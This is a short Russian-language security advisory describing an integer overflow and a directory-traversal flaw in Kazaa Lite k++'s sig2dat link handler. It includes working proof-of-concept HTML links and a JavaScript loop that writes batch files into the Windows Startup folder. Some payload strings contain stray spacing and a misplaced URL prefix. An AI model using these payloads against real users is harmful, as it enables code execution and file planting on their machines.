Программа: Kazaa lite k++
Обнаружено две уязвимости в менеджере пиринговых сетей Kazaa. Удаленный пользователь может вызвать отказ в обслуживании или выполнить произвольный код на уязвимой системе. Удаленный пользователь может создать произвольное количество файлов на текущем разделе.
1. Целочисленное переполнение в протоколе Sig2Dat позволяет вызвать отказ в обслуживании или выполнить произвольный код на уязвимой системе. Уязвимость существует в параметре Length в байтах. Удаленный пользователь может передать значение превышающее 999999999 и вызвать переполнение целочисленных. Удачная эксплуатация уязвимости позволит выполнить произвольный код на целевой системе.
Пример:
<A HREF="sig2dat://%7CFile:dev-catz5%28.bin%7CLength:
999999999999999999999999999%20Bytes,364489KB%7CUUHash:
=DEfm3HmvILkNcbY7j5NGa%2BD11CQ=%7C/">CLICK HERE</A>
2. Уязвимость в параметре File позволяет выйти за пределы директории и создать файл в любом месте раздела используя символы перехода между каталогами (‘../’).
Примеры:
<A href="https://xakep.ru/wp-content/uploads/post/25239/sig2dat://%7CFile:../../../../../../Docume~1/All Users/Start Menu/Programs/Startup/cool.bat%7CLength:
373236528%20Bytes,364489KB%7CUUHash:= DEfm3HmvILkNcbY7j5NGa%2BD11CQ =
%7C/">CLICK HERE</A>
<script>
var i
for (i=1;i<10000;i++)
{
mylocation="<iframe src='sig2dat://% CFile:../../../../../../Docume~1/All Users /StartMenu/Programs/Startup/cool"+i+".bat %7CLength:373236528%20Bytes, 364489KB%
7CUUHash:= DEfm3HmvILkNcbY7j5NGa%2BD11CQ=%7C/'> </iframe>";
document.write(mylocation);
}
</script>